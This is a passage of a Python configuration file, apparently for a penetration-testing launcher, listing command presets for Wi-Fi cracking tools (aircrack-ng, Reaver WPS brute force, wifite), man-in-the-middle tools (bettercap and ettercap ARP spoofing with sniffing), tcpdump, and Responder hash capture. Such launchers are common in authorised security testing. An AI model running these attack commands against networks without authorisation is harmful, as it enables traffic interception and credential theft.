            {"label": "Scan all visible networks",            "cmd": ["airodump-ng", "{iface}"], "output": None, "prompt": {"iface": "Monitor interface (e.g. wlan0mon)"}},
            {"label": "Capture handshake of a target network", "cmd": ["airodump-ng", "-c", "{channel}", "--bssid", "{bssid}", "-w", "{outfile}", "{iface}"], "output": None, "prompt": {"iface": "Monitor interface", "channel": "Channel (1-14)", "bssid": "Target BSSID", "outfile": "Capture prefix (e.g. capture)"}},
        ],
    },
    "aircrack-ng": {
        "name": "aircrack-ng",
        "binary": "aircrack-ng",
        "desc": "Crack WEP/WPA/WPA2 from a handshake capture",
        "category": "wireless",
        "output_dir": "wireless",
        "requires_root": False,
        "presets": [
            {"label": "Crack WPA with capture + wordlist", "cmd": ["aircrack-ng", "-w", "{wordlist}", "{capfile}"], "output": "aircrack", "wordlist": True, "prompt": {"capfile": "Capture file (.cap)"}},
        ],
    },
    "reaver": {
        "name": "Reaver",
        "binary": "reaver",
        "desc": "WPS attack by bruteforcing the PIN (8 digits) to recover the WPA key",
        "category": "wireless",
        "output_dir": "wireless",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "WPS brute-force attack", "cmd": ["reaver", "-i", "{iface}", "-b", "{bssid}", "-vv"], "output": None, "prompt": {"iface": "Monitor interface", "bssid": "Target BSSID"}},
        ],
    },
    "wifite": {
        "name": "Wifite",
        "binary": "wifite",
        "desc": "Automated Wi-Fi attack: WEP, WPA, WPS, PMKID (auto mode)",
        "category": "wireless",
        "output_dir": "wireless",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "Automatic attack (all networks)", "cmd": ["wifite", "--all"],  "output": None},
            {"label": "Targeted attack (interactive selection)", "cmd": ["wifite"],       "output": None},
        ],
    },

    # ---------------- NETWORK / MITM ----------------
    "bettercap": {
        "name": "Bettercap",
        "binary": "bettercap",
        "desc": "MITM framework: ARP spoof, DNS spoof, cred capture, HTTP injector",
        "category": "network",
        "output_dir": "network",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "Launch bettercap (interactive shell)", "cmd": ["bettercap", "-iface", "{iface}"],                                                                                    "output": None, "prompt": {"iface": "Interface (e.g. eth0)"}},
            {"label": "ARP spoof + sniffer on target",        "cmd": ["bettercap", "-iface", "{iface}", "-eval", "set arp.spoof.targets {target}; arp.spoof on; net.sniff on"],             "output": None, "prompt": {"iface": "Interface", "target": "Target IP"}},
        ],
    },
    "ettercap": {
        "name": "Ettercap",
        "binary": "ettercap",
        "desc": "Classic MITM: ARP poisoning, password sniffing, plugins",
        "category": "network",
        "output_dir": "network",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "ARP poisoning between two hosts", "cmd": ["ettercap", "-T", "-M", "arp:remote", "-i", "{iface}", "/{target1}//", "/{target2}//"], "output": None, "prompt": {"iface": "Interface", "target1": "Target 1 (victim IP)", "target2": "Target 2 (gateway)"}},
        ],
    },
    "tcpdump": {
        "name": "tcpdump",
        "binary": "tcpdump",
        "desc": "Capture and analyze network packets on the command line",
        "category": "network",
        "output_dir": "network",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "Capture on interface",       "cmd": ["tcpdump", "-i", "{iface}"],                   "output": None, "prompt": {"iface": "Interface (e.g. eth0)"}},
            {"label": "Filter by host",              "cmd": ["tcpdump", "-i", "{iface}", "host", "{host}"], "output": None, "prompt": {"iface": "Interface"}},
            {"label": "Filter by port",              "cmd": ["tcpdump", "-i", "{iface}", "port", "{pfilter}"], "output": None, "prompt": {"iface": "Interface", "pfilter": "Port (e.g. 80)"}},
            {"label": "Save capture (.pcap)",        "cmd": ["tcpdump", "-i", "{iface}", "-w", "{pcap}"],   "output": None, "prompt": {"iface": "Interface", "pcap": "Output file (e.g. capture.pcap)"}},
        ],
    },
    "responder": {
        "name": "Responder",
        "binary": "responder",
        "desc": "Poison LLMNR/NBT-NS/mDNS to capture NetNTLM hashes on the network",
        "category": "network",
        "output_dir": "network",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "Launch Responder (active listen mode)", "cmd": ["responder", "-I", "{iface}", "-rdwv"], "output": None, "prompt": {"iface": "Interface (e.g. eth0)"}},
        ],
    },
}


def get_tool(key):
    return TOOLS.get(key)


def all_tool_keys():
    return list(TOOLS.keys())


def tools_by_category(category):
    return {k: v for k, v in TOOLS.items() if v.get("category") == category}
